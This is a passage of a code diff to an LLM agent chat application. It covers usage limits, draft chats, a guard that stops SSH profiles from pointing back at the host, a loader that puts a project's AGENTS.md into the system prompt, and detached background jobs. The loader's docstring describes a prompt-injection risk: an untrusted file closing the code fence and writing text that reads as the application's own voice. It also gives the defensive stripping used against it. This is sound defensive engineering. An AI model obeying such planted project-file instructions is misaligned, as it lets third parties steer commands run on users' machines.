# Nobody is limited until somebody says so. A quota that arrived with an upgrade
|
||||
# and started refusing replies would be the worst possible way to introduce one.
|
||||
NO_LIMITS: dict[str, int] = dict.fromkeys(LIMIT_KEYS, 0)
|
||||
|
||||
|
||||
def limits_for(db: DBSession, user: User | None) -> dict[str, int]:
|
||||
"""What this user may spend, resolved across their groups.
|
||||
|
||||
**By maximum**, which is the union rule applied to numbers: being in a second
|
||||
group can only ever grant more, never less. That is the same promise the
|
||||
permissions make, and having one of the two work the other way round is how
|
||||
"why can this person not do X" stops being answerable.
|
||||
|
||||
**Zero wins outright**, because zero means "no limit". Taking the plain
|
||||
maximum would make a group saying "unlimited" count for less than one saying
|
||||
"a million", which is the union rule inverted for exactly one value -- and it
|
||||
is the value somebody sets when they mean *stop limiting this person*.
|
||||
|
||||
An administrator is unlimited, for the reason `resolve` gives them every
|
||||
permission: they can raise their own quota in two clicks, and pretending
|
||||
otherwise is theatre.
|
||||
"""
|
||||
if user is None or user.is_admin:
|
||||
return dict(NO_LIMITS)
|
||||
|
||||
resolved = dict(NO_LIMITS)
|
||||
for key in LIMIT_KEYS:
|
||||
values = []
|
||||
for group in user.groups:
|
||||
raw = (group.limits_json or {}).get(key)
|
||||
if raw is None:
|
||||
continue # no opinion, contributes nothing
|
||||
try:
|
||||
values.append(max(0, int(raw)))
|
||||
except (TypeError, ValueError):
|
||||
continue
|
||||
if not values or 0 in values:
|
||||
resolved[key] = 0
|
||||
else:
|
||||
resolved[key] = max(values)
|
||||
return resolved
|
||||
|
||||
|
||||
def limit(db: DBSession, user: User | None, key: str) -> int:
|
||||
return limits_for(db, user).get(key, 0)
|
||||
|
||||
|
||||
def models_visible_to(db: DBSession, user: User | None) -> list[Model]:
|
||||
"""Models a user may start a chat with, in display order.
|
||||
|
||||
|
||||
@@ -107,55 +107,6 @@ class RemoteEntry:
|
||||
return self.name.startswith(".")
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class RemoteFile:
|
||||
"""A file as somebody is about to edit it, rather than as a model reads it.
|
||||
|
||||
Separate from what `read_file` returns for the same reason `RemoteEntry` is
|
||||
separate from `list_dir`: the model-facing contract is right for a model and
|
||||
wrong here. `read_file` runs its result through `clean_output`, which strips
|
||||
escape sequences and decodes with errors="replace" -- so a file opened
|
||||
through it and saved back would come out rewritten.
|
||||
|
||||
`binary` means there is nothing safe to put in a textarea, and the tab opens
|
||||
read-only. `truncated` means the same for a different reason: saving back
|
||||
the first 256KB of a larger file is how the rest of it is deleted.
|
||||
"""
|
||||
|
||||
text: str
|
||||
size: int = 0
|
||||
mtime: int = 0
|
||||
truncated: bool = False
|
||||
binary: bool = False
|
||||
|
||||
@property
|
||||
def revision(self) -> str:
|
||||
return revision_of(self.mtime, self.size)
|
||||
|
||||
|
||||
def revision_of(mtime: int, size: int) -> str:
|
||||
"""An opaque token saying which version of a file was read.
|
||||
|
||||
Round-tripped through a hidden field and compared on the way back in. Not a
|
||||
hash: hashing means reading the whole file again on every save, and this
|
||||
catches the case it exists for -- somebody else's editor, a build, a
|
||||
checkout -- without it.
|
||||
"""
|
||||
return f"{mtime}:{size}"
|
||||
|
||||
|
||||
class Conflict(Exception):
|
||||
"""The file moved between being opened and being saved.
|
||||
|
||||
Carries the revision found instead, so the card offering Overwrite has
|
||||
something to compare against.
|
||||
"""
|
||||
|
||||
def __init__(self, found: str = "") -> None:
|
||||
super().__init__("That file changed after it was opened.")
|
||||
self.found = found
|
||||
|
||||
|
||||
class Executor(Protocol):
|
||||
"""How a target is acted on. See `ssh.py`; there is no local variant."""
|
||||
|
||||
@@ -165,10 +116,6 @@ class Executor(Protocol):
|
||||
|
||||
async def write_file(self, path: str, text: str) -> int: ...
|
||||
|
||||
async def read_text(self, path: str, *, max_bytes: int) -> RemoteFile: ...
|
||||
|
||||
async def write_text(self, path: str, text: str, *, if_unchanged: str) -> RemoteFile: ...
|
||||
|
||||
async def list_dir(self, path: str) -> list[str]: ...
|
||||
|
||||
async def scan_dir(self, path: str) -> list[RemoteEntry]: ...
|
||||
|
||||
@@ -1,183 +0,0 @@
|
||||
"""A chat that does not exist yet, so its panels can.
|
||||
|
||||
Chats are created lazily -- there is no endpoint that makes an empty one, and
|
||||
the row appears together with its first message. That is a rule worth keeping:
|
||||
an opened-and-abandoned composer should leave nothing behind. But it also meant
|
||||
the terminal and the canvas were unavailable on the one screen where you are
|
||||
deciding *which machine to work on*, which is exactly when you want to look
|
||||
around it first.
|
||||
|
||||
A draft is the smallest thing that fixes that: an id, and the three facts the
|
||||
panels need behind it. It is not a chat and never becomes one -- when the first
|
||||
prompt is sent, a real chat is created and the draft's shell and tabs are
|
||||
**adopted** into it, which is a re-key and a copy rather than a promotion.
|
||||
|
||||
The id is derived from (owner, connection, directory) rather than invented, so
|
||||
that returning to the same new-chat screen finds the same shell and the same
|
||||
tabs instead of quietly starting a second one. It is a hash so that neither the
|
||||
directory nor the owner is legible in a URL.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import time
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
# How long a draft survives without being touched. Generous, because it is
|
||||
# holding somebody's open files while they decide what to do; bounded, because
|
||||
# nothing else will ever clean it up -- an abandoned new-chat screen leaves no
|
||||
# row to cascade from and no chat to delete.
|
||||
IDLE_TIMEOUT = 3600.0
|
||||
|
||||
# The prefix a draft id carries. It has to be distinguishable from a chat id at
|
||||
# a glance and by code: `Chat.id` is 32 hex characters from `new_id`, so
|
||||
# nothing here can collide with one by accident.
|
||||
PREFIX = "draft_"
|
||||
|
||||
|
||||
@dataclass
|
||||
class Draft:
|
||||
"""What a draft knows, which is only what the panels ask for."""
|
||||
|
||||
id: str
|
||||
owner_id: str
|
||||
profile_id: str
|
||||
project_dir: str
|
||||
# The canvas's tab strip, in the shape `Chat.canvas_json` holds. In memory
|
||||
# rather than on a row for the obvious reason, and carried onto the chat at
|
||||
# adoption.
|
||||
canvas_json: dict = field(default_factory=dict)
|
||||
touched_at: float = field(default_factory=time.monotonic)
|
||||
|
||||
|
||||
_DRAFTS: dict[str, Draft] = {}
|
||||
|
||||
|
||||
def is_draft(chat_id: str) -> bool:
|
||||
return bool(chat_id) and chat_id.startswith(PREFIX)
|
||||
|
||||
|
||||
def key_for(owner_id: str, profile_id: str, project_dir: str) -> str:
|
||||
"""The id for one (owner, connection, directory), stably.
|
||||
|
||||
Derived rather than random so that reopening the new-chat screen on the same
|
||||
target finds the shell that is already running there. The owner is in the
|
||||
hash so that two people pointed at the same directory of the same connection
|
||||
do not share a draft -- they would share a *shell*, and the terminal's own
|
||||
"one chat, one shell" rule is scoped to a person's chats.
|
||||
"""
|
||||
material = "\0".join((owner_id, profile_id, project_dir or ""))
|
||||
digest = hashlib.sha256(material.encode("utf-8")).hexdigest()
|
||||
return f"{PREFIX}{digest[:24]}"
|
||||
|
||||
|
||||
def remember(owner_id: str, profile_id: str, project_dir: str) -> Draft:
|
||||
"""The draft for this target, created if this is the first time."""
|
||||
_sweep()
|
||||
key = key_for(owner_id, profile_id, project_dir)
|
||||
draft = _DRAFTS.get(key)
|
||||
if draft is None:
|
||||
draft = Draft(
|
||||
id=key, owner_id=owner_id, profile_id=profile_id, project_dir=project_dir or ""
|
||||
)
|
||||
_DRAFTS[key] = draft
|
||||
draft.touched_at = time.monotonic()
|
||||
return draft
|
||||
|
||||
|
||||
def get(draft_id: str, owner_id: str) -> Draft | None:
|
||||
"""One draft, if it is this person's.
|
||||
|
||||
The id is a hash of the owner, so a draft belonging to somebody else cannot
|
||||
be guessed -- but it is checked rather than assumed, because "unguessable"
|
||||
is not an authorisation and the next caller might build the id differently.
|
||||
"""
|
||||
draft = _DRAFTS.get(draft_id or "")
|
||||
if draft is None or draft.owner_id != owner_id:
|
||||
return None
|
||||
draft.touched_at = time.monotonic()
|
||||
return draft
|
||||
|
||||
|
||||
def forget(draft_id: str) -> None:
|
||||
_DRAFTS.pop(draft_id or "", None)
|
||||
|
||||
|
||||
def clear() -> None:
|
||||
_DRAFTS.clear()
|
||||
|
||||
|
||||
def as_chat(draft: Draft) -> Any:
|
||||
"""A `Chat` the panels can use, constructed and never saved.
|
||||
|
||||
This is the whole trick, and it is worth being precise about why it is safe.
|
||||
`canvas.agent_ready`, `canvas._executor`, `_load_agent`/`_save_agent` and
|
||||
`agent_session.resolve` read exactly four things off a chat -- `user_id`,
|
||||
`kind`, `ssh_profile_id` and `project_dir` -- and none of them passes the
|
||||
chat to a query or writes it back. So a transient row satisfies every one of
|
||||
them unchanged, and no code that already works has to learn what a draft is.
|
||||
|
||||
`id` and `canvas_json` are set explicitly: both are *column* defaults, which
|
||||
SQLAlchemy applies at flush, and this row is never flushed. An unset `id` is
|
||||
not a cosmetic problem -- see `SOURCES_NEEDING_A_CHAT`.
|
||||
"""
|
||||
from lembas.db.models import KIND_AGENT, Chat
|
||||
|
||||
return Chat(
|
||||
id=draft.id,
|
||||
user_id=draft.owner_id,
|
||||
kind=KIND_AGENT,
|
||||
ssh_profile_id=draft.profile_id,
|
||||
project_dir=draft.project_dir,
|
||||
canvas_json=dict(draft.canvas_json or {}),
|
||||
agent_mode="",
|
||||
scope_json={},
|
||||
)
|
||||
|
||||
|
||||
# Canvas sources a draft may not open, refused by name.
|
||||
#
|
||||
# `scratch` needs a row: `scratch_service.for_chat` would write a `ScratchDoc`
|
||||
# keyed on a chat that does not exist, which is the lazy-creation rule broken
|
||||
# outright rather than bent.
|
||||
#
|
||||
# `file` is the one that matters. `canvas._load_file` authorises with
|
||||
# `attachment.chat_id != chat.id`, and an upload made on the new-chat screen is
|
||||
# stored with `chat_id=None`. If a draft's chat carried no id, `None != None` is
|
||||
# False and every unclaimed attachment its owner has would open from any draft
|
||||
# canvas. `as_chat` sets an id, so that comparison already fails -- but relying
|
||||
# on it would mean the guarantee lives in an id-shaped coincidence. It is stated
|
||||
# here instead, where it can be read and tested.
|
||||
SOURCES_NEEDING_A_CHAT = frozenset({"scratch", "file"})
|
||||
|
||||
|
||||
def refuses(source: str) -> bool:
|
||||
return source in SOURCES_NEEDING_A_CHAT
|
||||
|
||||
|
||||
def _sweep() -> None:
|
||||
"""Drop drafts nobody has touched in a long while.
|
||||
|
||||
On write rather than on a timer: a draft holds no connection and no process,
|
||||
only a little state, so there is nothing to close and nothing that leaks by
|
||||
being late. The shell it points at has its own reaper.
|
||||
"""
|
||||
cutoff = time.monotonic() - IDLE_TIMEOUT
|
||||
for key in [k for k, d in _DRAFTS.items() if d.touched_at < cutoff]:
|
||||
_DRAFTS.pop(key, None)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"SOURCES_NEEDING_A_CHAT",
|
||||
"Draft",
|
||||
"as_chat",
|
||||
"clear",
|
||||
"forget",
|
||||
"get",
|
||||
"is_draft",
|
||||
"key_for",
|
||||
"refuses",
|
||||
"remember",
|
||||
]
|
||||
@@ -1,249 +0,0 @@
|
||||
"""Whether an SSH connection is allowed to point back at this machine.
|
||||
|
||||
The whole design of agent chats rests on one sentence: nothing runs on the host
|
||||
LLeMbas is installed on. That is why there is no local sandbox, why local MCP
|
||||
over stdio is absent, and why "the security of an agent chat is the security of
|
||||
the host behind its profile" is a statement anybody can check.
|
||||
|
||||
An SSH profile pointed at `127.0.0.1` walks straight past it. The commands go
|
||||
over SSH, through a real login, and every gate in `policy.py` still applies --
|
||||
and they land on the machine holding the database, the Fernet key and every
|
||||
other user's encrypted credentials. Nothing else in the codebase can tell that
|
||||
apart from a container on the network, because from the SSH layer's point of
|
||||
view it is not different.
|
||||
|
||||
So it is a decision an administrator makes deliberately, in one of three
|
||||
positions:
|
||||
|
||||
- **off** (the default, including on an instance upgrading into this) -- no
|
||||
connection may point at loopback, and one that already does is refused rather
|
||||
than quietly kept working.
|
||||
- **port** -- allowed on exactly one port. This is the position that has a real
|
||||
use: a container that publishes its SSH port on the host's loopback interface
|
||||
is genuinely somewhere else, and `127.0.0.1:2222` is how you reach it. Port 22
|
||||
is refused even here, because that is the host's own sshd.
|
||||
- **on** -- allowed anywhere. For somebody who has read the paragraph above and
|
||||
means it.
|
||||
|
||||
## Literal or resolved, and never resolved on the request path
|
||||
|
||||
Both are checked, at two different moments, and the split is not tidiness.
|
||||
|
||||
The literal forms -- `127.0.0.1`, `::1`, `localhost`, anything in
|
||||
`127.0.0.0/8` -- are decided from the string with no I/O at all. That is the
|
||||
check `refusal` makes, and it is why `refusal` can be called from a page render,
|
||||
from `resolve_tools` and from the composer's profile listing.
|
||||
|
||||
A *name* that resolves to loopback needs `getaddrinfo`, which is a blocking
|
||||
network call, and putting one of those behind a check that runs several times
|
||||
per request is how a page render comes to wait out a DNS timeout for a host
|
||||
nobody is even talking to. The first version of this file did exactly that and
|
||||
the test suite went from two minutes to not finishing. So resolution happens
|
||||
**only where a network call is already expected and already awaited** -- saving
|
||||
a connection, and pressing Check -- and the answer is written to
|
||||
`SshProfile.resolves_here`, which the request path reads for free.
|
||||
|
||||
The consequence, stated rather than discovered: a name whose DNS changes to
|
||||
point here after it was saved is not noticed until it is saved or checked again.
|
||||
That is a real gap and it is the right trade. The alternative is a DNS lookup in
|
||||
front of every agent page load, and a guard that makes the application feel
|
||||
broken is a guard somebody turns off.
|
||||
|
||||
A refusal is never silent. Every caller that has somewhere to put a sentence
|
||||
puts this one there, because "this connection cannot be used" with no reason is
|
||||
indistinguishable from a bug.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import ipaddress
|
||||
import logging
|
||||
import socket
|
||||
from typing import TYPE_CHECKING
|
||||
|
||||
if TYPE_CHECKING: # pragma: no cover - typing only
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import SshProfile
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
MODE_OFF = "off"
|
||||
MODE_PORT = "port"
|
||||
MODE_ON = "on"
|
||||
MODES = (MODE_OFF, MODE_PORT, MODE_ON)
|
||||
|
||||
MODE_LABELS = {
|
||||
MODE_OFF: "Never",
|
||||
MODE_PORT: "Only on one port",
|
||||
MODE_ON: "Anywhere",
|
||||
}
|
||||
MODE_HINTS = {
|
||||
MODE_OFF: (
|
||||
"A connection to this machine is refused, and an existing one stops "
|
||||
"working. This is what keeps “nothing runs on the LLeMbas host” true."
|
||||
),
|
||||
MODE_PORT: (
|
||||
"For a container that publishes its SSH port on this machine's loopback "
|
||||
"interface. Name that port; everything else here is still refused, and "
|
||||
"port 22 is refused regardless, because that one is this host's own sshd."
|
||||
),
|
||||
MODE_ON: (
|
||||
"Any port on this machine. Commands then run beside the database and the "
|
||||
"encryption key, with whatever the login account can reach."
|
||||
),
|
||||
}
|
||||
|
||||
# The host's own sshd, and never what somebody means by "the container on 2222".
|
||||
HOST_SSH_PORT = 22
|
||||
|
||||
|
||||
def _literal(host: str) -> bool | None:
|
||||
"""True/False when the host decides itself, None when it needs resolving."""
|
||||
text = (host or "").strip().strip("[]").lower()
|
||||
if not text:
|
||||
return False
|
||||
# Not a real hostname anywhere, and the one everybody types.
|
||||
if text in ("localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"):
|
||||
return True
|
||||
try:
|
||||
address = ipaddress.ip_address(text)
|
||||
except ValueError:
|
||||
return None
|
||||
# `is_unspecified` as well as `is_loopback`, because `0.0.0.0` and `::` are
|
||||
# neither a real destination nor a refused one: connect() to either goes to
|
||||
# loopback on Linux, so an SSH profile pointed at `0.0.0.0` reached this
|
||||
# host's own sshd. `is_loopback` alone answered a decided **False**, which
|
||||
# also short-circuited `resolves_here`, so the DNS half never ran either --
|
||||
# the one spelling of "this machine" that walked past a guard whose whole
|
||||
# job is that sentence.
|
||||
return address.is_loopback or address.is_unspecified
|
||||
|
||||
|
||||
def is_loopback(host: str) -> bool:
|
||||
"""Whether this host *string* reaches the machine LLeMbas is running on.
|
||||
|
||||
No I/O, ever. A name is answered False here and settled by `resolves_here`
|
||||
at the two moments a lookup is affordable -- see the module docstring; the
|
||||
version of this that resolved inline made every agent page wait on DNS.
|
||||
"""
|
||||
return bool(_literal(host))
|
||||
|
||||
|
||||
def resolves_here(host: str) -> bool:
|
||||
"""The same question for a name, by resolving it. Blocking; call sparingly.
|
||||
|
||||
Resolution failure is answered **False**: a name that does not resolve is not
|
||||
a name pointing here, and refusing it would turn every DNS hiccup into "your
|
||||
connection is on this machine", which is both wrong and confusing. The
|
||||
connection itself will fail on its own terms a moment later.
|
||||
"""
|
||||
decided = _literal(host)
|
||||
if decided is not None:
|
||||
return decided
|
||||
|
||||
try:
|
||||
for entry in socket.getaddrinfo((host or "").strip().lower(), None):
|
||||
if _literal(str(entry[4][0])):
|
||||
return True
|
||||
except OSError:
|
||||
return False
|
||||
return False
|
||||
|
||||
|
||||
def policy(db: DBSession) -> tuple[str, int]:
|
||||
"""The configured position, and the port that goes with `port`."""
|
||||
from lembas.services import settings_store
|
||||
|
||||
values = settings_store.agents(db)
|
||||
mode = str(values.get("loopback") or MODE_OFF)
|
||||
if mode not in MODES:
|
||||
mode = MODE_OFF
|
||||
try:
|
||||
port = int(values.get("loopback_port") or 0)
|
||||
except (TypeError, ValueError):
|
||||
port = 0
|
||||
return mode, port
|
||||
|
||||
|
||||
def refusal(db: DBSession, host: str, port: int, *, resolved: bool = False) -> str:
|
||||
"""Why this host and port may not be used, or "" if they may.
|
||||
|
||||
A sentence rather than a boolean, because every caller has somewhere to show
|
||||
one and a connection that is unavailable for no stated reason reads as a
|
||||
fault in the application.
|
||||
|
||||
`resolved` is what a stored profile's `resolves_here` column carries in: the
|
||||
string said nothing, and a lookup made earlier said yes.
|
||||
"""
|
||||
if not (resolved or is_loopback(host)):
|
||||
return ""
|
||||
|
||||
mode, allowed = policy(db)
|
||||
if mode == MODE_ON:
|
||||
return ""
|
||||
if mode == MODE_PORT:
|
||||
if allowed and port == allowed and port != HOST_SSH_PORT:
|
||||
return ""
|
||||
if allowed:
|
||||
return (
|
||||
f"This connection points at this machine, which is only allowed "
|
||||
f"on port {allowed}. An administrator sets that on the Agents page."
|
||||
)
|
||||
return (
|
||||
"This connection points at this machine, which is allowed only on a "
|
||||
"port an administrator has named — and none has been."
|
||||
)
|
||||
return (
|
||||
"This connection points at the machine LLeMbas itself runs on, which an "
|
||||
"administrator has not allowed. Agent chats are meant to reach a "
|
||||
"different host; running here would put the commands beside the database "
|
||||
"and the encryption key."
|
||||
)
|
||||
|
||||
|
||||
def refusal_for(db: DBSession, profile: SshProfile | None) -> str:
|
||||
"""The same answer for a stored profile, with no lookup.
|
||||
|
||||
`resolves_here` is the verdict recorded the last time somebody saved or
|
||||
checked this connection. Reading it is what keeps this callable from a page
|
||||
render.
|
||||
"""
|
||||
if profile is None:
|
||||
return ""
|
||||
return refusal(
|
||||
db, profile.host, profile.port, resolved=bool(getattr(profile, "resolves_here", False))
|
||||
)
|
||||
|
||||
|
||||
def usable(db: DBSession, profile: SshProfile | None) -> bool:
|
||||
return not refusal_for(db, profile)
|
||||
|
||||
|
||||
def restamp(profile: SshProfile) -> bool:
|
||||
"""Record whether this profile's host resolves to loopback, and return it.
|
||||
|
||||
Called where a network call is already happening -- saving a connection, and
|
||||
Check. The column is the request path's only way of knowing about a *name*,
|
||||
so a save that skips this leaves the guard reading a stale answer.
|
||||
"""
|
||||
profile.resolves_here = resolves_here(profile.host)
|
||||
return profile.resolves_here
|
||||
|
||||
|
||||
__all__ = [
|
||||
"HOST_SSH_PORT",
|
||||
"MODES",
|
||||
"MODE_HINTS",
|
||||
"MODE_LABELS",
|
||||
"MODE_OFF",
|
||||
"MODE_ON",
|
||||
"MODE_PORT",
|
||||
"is_loopback",
|
||||
"policy",
|
||||
"refusal",
|
||||
"refusal_for",
|
||||
"resolves_here",
|
||||
"restamp",
|
||||
"usable",
|
||||
]
|
||||
@@ -18,7 +18,7 @@ a model choosing to run something. Both are read-only, both are built here
|
||||
rather than assembled from anything a model said, and the project directory is
|
||||
configuration rather than input. It is still an exception to Manual mode's
|
||||
"everything is shown to you before it happens", and it is written down in
|
||||
the working notes, next to the others.
|
||||
CLAUDE.md next to the others.
|
||||
|
||||
**Nothing here is trusted.** Filenames come off somebody else's machine and end
|
||||
up inside a system prompt, so they are stripped of control characters, capped
|
||||
|
||||
@@ -1,212 +0,0 @@
|
||||
"""The project's own notes on how to work in it — AGENTS.md, CLAUDE.md.
|
||||
|
||||
A file in the root of the project directory, read once per reply and put in the
|
||||
system message. Everything about the shape of this module is copied from
|
||||
`index.py`, and for the same three reasons:
|
||||
|
||||
* **`cached()` never does work.** `harness.context_variables` is synchronous and
|
||||
runs on the request path, so an SFTP round trip from there would hold a
|
||||
request open while somebody's box thought about it. The build happens in
|
||||
`generation._warm_project`, which is async and already doing network work.
|
||||
* **`ensure()` shares one build between concurrent callers**, via `_BUILDING`
|
||||
and `asyncio.shield`.
|
||||
* **Each name catches its own `ExecError`.** This is the ladder lesson from
|
||||
`index.py` arriving before the bug does: an `AGENTS.md` that cannot be read --
|
||||
a permission, an SFTP-only account, a directory where a file was expected --
|
||||
must not stop `CLAUDE.md` being tried.
|
||||
|
||||
The contents are **untrusted**, and go into the *system* message of a chat that
|
||||
can run commands. Nothing here can fix that; what does is the wording of the
|
||||
`context.agent_instructions` fragment, which names where the file came from and
|
||||
bounds what it is allowed to do. Two things are done here: control characters
|
||||
are stripped, and backticks are neutralised so the file cannot close the fence
|
||||
it is put inside and start writing what looks like our own prose.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import posixpath
|
||||
import re
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
|
||||
from lembas.services.agent.base import ExecError, Executor
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
# In order. AGENTS.md first because it is the vendor-neutral convention a shared
|
||||
# repository is likeliest to carry; CLAUDE.md next because it is the one most
|
||||
# widely written in practice. Root only, no recursion: a per-directory
|
||||
# convention is a different feature with a different cost model.
|
||||
NAMES = ("AGENTS.md", "CLAUDE.md", "AGENT.md", ".agents.md")
|
||||
|
||||
TTL = 300.0
|
||||
MAX_CACHED = 64
|
||||
|
||||
# The default ceiling on what reaches the prompt. The admin setting wins.
|
||||
MAX_CHARS = 4000
|
||||
|
||||
_CONTROL = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]")
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Instructions:
|
||||
"""What was found in the project root, and where."""
|
||||
|
||||
filename: str = ""
|
||||
text: str = ""
|
||||
built_at: float = 0.0
|
||||
|
||||
@property
|
||||
def ok(self) -> bool:
|
||||
return bool(self.filename and self.text.strip())
|
||||
|
||||
|
||||
def clean(raw: str) -> str:
|
||||
"""Made safe to put inside a fenced block in a system message."""
|
||||
text = _CONTROL.sub("", raw).replace("\r\n", "\n").replace("\r", "\n")
|
||||
# It must not be able to close our fence and carry on in what then reads as
|
||||
# our own voice. Replaced rather than escaped: this is a display of somebody
|
||||
# else's file, not a round trip.
|
||||
return text.replace("```", "'''")
|
||||
|
||||
|
||||
async def build(executor: Executor, budget: int = MAX_CHARS) -> Instructions:
|
||||
"""Look for each name in turn, and stop at the first one that reads."""
|
||||
for name in NAMES:
|
||||
try:
|
||||
# Four bytes a character is generous for UTF-8 prose and stops a
|
||||
# two-megabyte file being pulled across to be thrown away.
|
||||
raw = await executor.read_file(name, max_bytes=max(budget, 1) * 4)
|
||||
except ExecError:
|
||||
# Its own catch, per name. A rung that raises must not end the
|
||||
# ladder -- that bug has already been paid for once in index.py.
|
||||
continue
|
||||
except Exception: # noqa: BLE001 - a warm-up must never kill a reply
|
||||
log.debug("could not read %s", name, exc_info=True)
|
||||
continue
|
||||
|
||||
text = clean(raw)
|
||||
if text.strip():
|
||||
return Instructions(filename=name, text=text, built_at=time.monotonic())
|
||||
|
||||
return Instructions(built_at=time.monotonic())
|
||||
|
||||
|
||||
# --- The cache ---------------------------------------------------------------
|
||||
# Keyed on the connection and the directory, exactly as the listing is: two
|
||||
# chats on one tree are looking at the same file.
|
||||
_CACHE: dict[tuple[str, str], Instructions] = {}
|
||||
_BUILDING: dict[tuple[str, str], asyncio.Task] = {}
|
||||
|
||||
|
||||
def cached(profile_id: str, project_dir: str) -> Instructions | None:
|
||||
"""What is already known, or None. Never does any work.
|
||||
|
||||
A miss is not "there is no file" -- it is "nobody has looked yet", and the
|
||||
fragment's `requires` turns both into the same thing: no section at all.
|
||||
"""
|
||||
found = _CACHE.get((profile_id, project_dir))
|
||||
if found is None:
|
||||
return None
|
||||
if time.monotonic() - found.built_at > TTL:
|
||||
_CACHE.pop((profile_id, project_dir), None)
|
||||
return None
|
||||
return found
|
||||
|
||||
|
||||
async def ensure(
|
||||
executor: Executor,
|
||||
profile_id: str,
|
||||
project_dir: str,
|
||||
*,
|
||||
budget: int = MAX_CHARS,
|
||||
refresh: bool = False,
|
||||
) -> Instructions:
|
||||
key = (profile_id, project_dir)
|
||||
if refresh:
|
||||
_CACHE.pop(key, None)
|
||||
elif (found := cached(profile_id, project_dir)) is not None:
|
||||
return found
|
||||
|
||||
if (running := _BUILDING.get(key)) is not None:
|
||||
return await asyncio.shield(running)
|
||||
|
||||
task = asyncio.create_task(build(executor, budget))
|
||||
_BUILDING[key] = task
|
||||
try:
|
||||
found = await task
|
||||
finally:
|
||||
_BUILDING.pop(key, None)
|
||||
|
||||
_CACHE[key] = found
|
||||
while len(_CACHE) > MAX_CACHED:
|
||||
_CACHE.pop(next(iter(_CACHE)))
|
||||
return found
|
||||
|
||||
|
||||
def is_instruction_file(path: str, project_dir: str) -> bool:
|
||||
"""Whether a written path is the file this module caches.
|
||||
|
||||
Resolved against the project directory rather than matched on the basename,
|
||||
so `./AGENTS.md`, `AGENTS.md` and `/work/AGENTS.md` are all it and
|
||||
`docs/AGENTS.md` is not -- root only, the same rule `build` follows. A
|
||||
basename match would drop the cache every time any subdirectory's own
|
||||
AGENTS.md was touched, which is a fetch nobody asked for.
|
||||
"""
|
||||
wanted = path.strip()
|
||||
if not wanted:
|
||||
return False
|
||||
if not posixpath.isabs(wanted) and project_dir:
|
||||
wanted = posixpath.join(project_dir, wanted)
|
||||
wanted = posixpath.normpath(wanted)
|
||||
return any(
|
||||
wanted == posixpath.normpath(posixpath.join(project_dir or "", name)) for name in NAMES
|
||||
)
|
||||
|
||||
|
||||
def forget(profile_id: str, project_dir: str) -> None:
|
||||
"""Drop it, because something just rewrote it.
|
||||
|
||||
The one case the TTL cannot cover: this process changing the file it has
|
||||
just quoted. Unlike the directory listing, an *edit* counts here as much as
|
||||
a write -- the listing only cares that the file exists, this cares what is
|
||||
in it.
|
||||
"""
|
||||
_CACHE.pop((profile_id, project_dir), None)
|
||||
|
||||
|
||||
def clear() -> None:
|
||||
_CACHE.clear()
|
||||
|
||||
|
||||
def render(found: Instructions | None, budget: int) -> str:
|
||||
"""The text, within the budget, cut at a line boundary."""
|
||||
if found is None or not found.ok or budget <= 0:
|
||||
return ""
|
||||
text = found.text.strip()
|
||||
if len(text) <= budget:
|
||||
return text
|
||||
cut = text[:budget]
|
||||
at = cut.rfind("\n")
|
||||
if at > budget // 2:
|
||||
cut = cut[:at]
|
||||
return f"{cut.rstrip()}\n… (truncated)"
|
||||
|
||||
|
||||
__all__ = [
|
||||
"MAX_CHARS",
|
||||
"NAMES",
|
||||
"TTL",
|
||||
"Instructions",
|
||||
"build",
|
||||
"cached",
|
||||
"clean",
|
||||
"clear",
|
||||
"ensure",
|
||||
"forget",
|
||||
"is_instruction_file",
|
||||
"render",
|
||||
]
|
||||
@@ -1,732 +0,0 @@
|
||||
"""Commands that outlive the reply that started them.
|
||||
|
||||
An ordinary `shell_run` is one blocking `conn.run` over a per-call connection
|
||||
(`ssh.py`): when it hits its timeout the command is killed, so a ten-minute
|
||||
`apt install` is impossible. A background job is the same command launched
|
||||
*detached* on the far side -- `setsid`, redirected to a remote logfile and an
|
||||
exit-file -- so it survives the connection closing. LLeMbas reconnects (a fresh
|
||||
connection, as always) to read the log and the exit code later.
|
||||
|
||||
This is the opposite of `terminal.py`, which survives by *holding* a connection
|
||||
open. Here we hold nothing: the whole point of `ssh.py`/`base.py` is that no live
|
||||
connection is kept, and a job that needed one would be a job that broke that.
|
||||
|
||||
**The command never touches a quoted shell context.** `sh -c '<cmd>'` shatters
|
||||
the instant the command contains a `'` -- `git commit -m 'fix'`, `awk '{…}'`,
|
||||
`sed 's/…/…/'` are the common case, not an edge one, and would also be an
|
||||
injection hole. So the command is base64-encoded here in Python and decoded on
|
||||
the far side into a script file; it is bytes, never shell syntax. Only
|
||||
server-generated hex ids and a fixed root ever reach a path.
|
||||
|
||||
Three things make the wrappers correct, and each was got wrong in an earlier
|
||||
sketch:
|
||||
|
||||
* **The child records its own pid via `$$`**, as its first act, under `setsid`
|
||||
where it is the session/group leader -- so `job_stop` can `kill -<pid>` the
|
||||
whole process group. `echo $!` from the launcher captures the wrong pid.
|
||||
* **The exit-file is the primary signal.** An empty pid-file means "still
|
||||
starting", not "dead"; reading liveness first would race the launch and report
|
||||
a job lost the instant it began.
|
||||
* **The command's exit status comes from the exit-file, never from the wrapper's
|
||||
own status** -- which is ~0 from the trailing `rm`. Reading the wrapper's
|
||||
status would mark every job a success.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import contextlib
|
||||
import logging
|
||||
import re
|
||||
import time
|
||||
import uuid
|
||||
from dataclasses import dataclass, field
|
||||
from datetime import UTC, datetime
|
||||
from typing import Any
|
||||
|
||||
from sqlalchemy import select
|
||||
|
||||
from lembas.services.agent.base import ExecError, ExecRequest, clean_output
|
||||
|
